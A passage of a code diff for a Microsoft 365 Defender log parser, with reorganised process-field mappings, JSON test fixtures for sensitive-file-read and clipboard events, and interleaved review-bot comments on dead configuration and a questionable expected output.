"{{json_event.message.properties.RegistryKey}}" registry.value: "{{json_event.message.properties.RegistryValueName}}" 
@@ -166,18 +154,6 @@ stages:
 action.properties.FileOriginReferrerUrl: "{{json_event.message.properties.FileOriginReferrerUrl}}"
 action.properties.FileOriginUrl: "{{json_event.message.properties.FileOriginUrl}}"
 action.properties.ISP: "{{json_event.message.properties.ISP or json_event.message.properties.Isp}}"
- action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
- action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
- action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
- action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
- action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
- action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
- action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
- action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
- action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
- action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
- action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
- action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
 action.properties.LocalIPType: "{{json_event.message.properties.LocalIPType}}"
 action.properties.Location: 
"{{json_event.message.properties.Location}}" action.properties.LogonId: "{{json_event.message.properties.LogonId}}" @@ -250,12 +226,6 @@ stages: - set: user.roles: '["{{json_event.message.properties.AccountType}}"]' filter: '{{json_event.message.properties.get("AccountType")}}' - - set: - process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 0}}' - - set: - process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 0}}' - set: network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' 
@@ -274,6 +244,98 @@ stages:
 }
 filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}'
+ set_process_events:
+ actions:
+ - set:
+ process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
+ process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
+ process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
+ process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}"
+ process.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}"
+ process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
+ process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}"
+ process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
+ process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
+ process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
+ process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
+ process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
+ process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
+ process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
+ process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
+ process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
+ action.properties.process.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
+ action.properties.process.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
+ 
action.properties.process.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
+ action.properties.process.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
+ action.properties.process.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}"
+ action.properties.process.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+ action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
+ action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
+ action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
+ action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
+ action.properties.process.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
+ action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
+
+ - set:
+ process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}'
+ filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}'
+
+ - set:
+ process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}'
+ filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}'
+
+ 
set_process_deviceprocess_events:
+ actions:
+ - set:
+ process.parent.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}"
+ process.parent.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}"
+ process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+ process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
+ process.parent.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
+ process.parent.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
+ process.parent.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
+ process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
+ process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}"
+ process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}"
+ process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
+ process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
+ process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
+ process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
+ process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
+ process.pid: "{{json_event.message.properties.ProcessId}}"
+ process.start: "{{json_event.message.properties.ProcessCreationTime}}"
+ process.name: "{{json_event.message.properties.FileName | basename}}"
+ process.command_line: "{{json_event.message.properties.ProcessCommandLine}}"
+ process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}"
+ 
action.properties.process.TokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
+ action.properties.process.IntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
+ action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
+ action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
+ action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
+ action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
+ action.properties.process.VersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
+ action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
+ action.properties.process.parent.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
+ action.properties.process.parent.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
+ action.properties.process.parent.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
+ action.properties.process.parent.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
+ action.properties.process.parent.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
+ action.properties.process.parent.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+ action.properties.process.parent.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
+ action.properties.process.parent.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
+ action.properties.process.parent.VersionInfoInternalFileName: 
"{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.process.parent.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.process.parent.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.process.parent.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + set_alert_evidence_fields: actions: - set: @@ -356,7 +418,7 @@ stages: event.dataset: "device_events" event.category: ["host"] action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}" - action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + #action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" set_device_file_certificate_info_fields: actions: - set: 
@@ -469,15 +531,15 @@ stages:
 - set:
 event.dataset: "device_process_events"
 event.category: ["process"]
- process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}"
- process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}"
- action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
- action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
- action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
- action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
- action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
- action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
- action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
+ #process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}"
+ #process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}"
+ #action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
+ #action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
+ #action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
+ #action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
+ #action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
+ 
#action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
+ #action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
 set_device_registry_events_fields:
 actions:
 - set:
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json
index ca708b0ed..17cad5081 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json
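Review bot: The nine `device_process_events` mappings are commented out rather than deleted, which leaves dead configuration that a later reader may assume is still live or un-comment, at which point `process.code_signature.*` would be set from the initiating-process signer columns again while `set_process_deviceprocess_events` already maps the same columns to `process.parent.code_signature.*` — two different objects from one source. Git history preserves the old lines, so remove them outright; if a breadcrumb is wanted, a single comment such as `# process and signer fields for this dataset are set in set_process_deviceprocess_events` says more than the dead YAML. The same applies to the commented `#action.properties.ProcessTokenElevation` line left in the `device_events` stage by the hunk above.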
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
new file mode 100644
index 000000000..fedd99aea
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json 
@@ -0,0 +1,100 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files 
(x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": 
"05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files 
(x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + 
"info" + ] + }, + "@timestamp": "2024-11-12T10:17:24.858829Z", + "action": { + "properties": { + "AccountSid": "S-1-2-3", + "process": { + "parent": { + "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "FileSize": 3316224, + "LogonId": "5223047", + "VersionInfoCompanyName": "Test Corporation", + "VersionInfoFileDescription": "Browser EXE", + "VersionInfoInternalFileName": "Browser.EXE", + "VersionInfoOriginalFileName": "Browser.EXE", + "VersionInfoProductName": "Test Product", + "VersionInfoProductVersion": "1, 0, 0, 1" + } + } + }, + "type": "SensitiveFileRead" + }, + "file": { + "directory": "C:\\Log", + "name": "FileName.mdb", + "size": 286720 + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "73291" + } + } + }, + "process": { + "name": "FileName.mdb", + "parent": { + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" + }, + "working_directory": "c:\\program files (x86)" + }, + "working_directory": "C:" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} 
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
similarity index 98%
rename from Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json
rename to Microsoft/microsoft-365-defender/tests/test_device_events_2.json
index 1f1351d52..494baa569 100644
--- a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
@@ -16,7 +16,11 @@
 "@timestamp": "2024-10-22T15:09:08.851712Z",
 "action": {
 "properties": {
- "InitiatingProcessLogonId": "0"
+ "process": {
+ "parent": {
+ "LogonId": "0"
+ }
+ }
 },
 "type": "ScriptContent"
 },
@@ -38,10 +42,9 @@
 },
 "process": {
 "parent": {
- "pid": 0
- },
- "pid": 417271,
- "start": "2024-10-22T15:09:08.624070Z"
+ "pid": 417271,
+ "start": "2024-10-22T15:09:08.624070Z"
+ }
 },
 "related": {
 "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
new file mode 100644
index 000000000..c34cefa50
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
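Review bot: The expected output pins `"process": { "name": "FileName.mdb", ... "working_directory": "C:" }` for a `SensitiveFileRead` row whose `ProcessId`, `ProcessCreationTime` and `ProcessCommandLine` are all `null` in the input, so the fixture locks in the read file being reported as a process; the same values already land under `file.name` / `file.directory`, which is where they belong. Once the parser stops mapping `FileName`/`FolderPath` into `process.*` for rows without a created process, drop `name` and `working_directory` from `expected.process` here so the test guards the correct shape rather than the current one. `process.parent.args` is listed in alphabetical order (`"/DBMode"`, `"/Network"`, ...) rather than command-line order, presumably because the harness sorts arrays before comparing — worth confirming, since argument order matters for detection logic. The file also lacks a trailing newline.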
@@ -0,0 +1,83 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"File
